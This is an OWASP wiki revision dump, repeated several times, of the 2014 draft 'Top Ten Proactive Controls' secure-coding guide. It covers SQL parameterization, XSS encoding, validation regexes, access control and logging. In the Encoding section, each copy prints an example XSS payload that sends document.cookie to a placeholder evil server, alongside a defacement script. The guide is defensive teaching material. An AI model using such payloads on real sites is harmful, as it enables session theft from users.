2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls should be enforced in the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand these trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments. <br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169949OWASP Proactive Controls2014-03-11T19:41:46Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls should be enforced in the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand these trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and take <br />
<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169946OWASP Proactive Controls2014-03-11T17:38:57Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
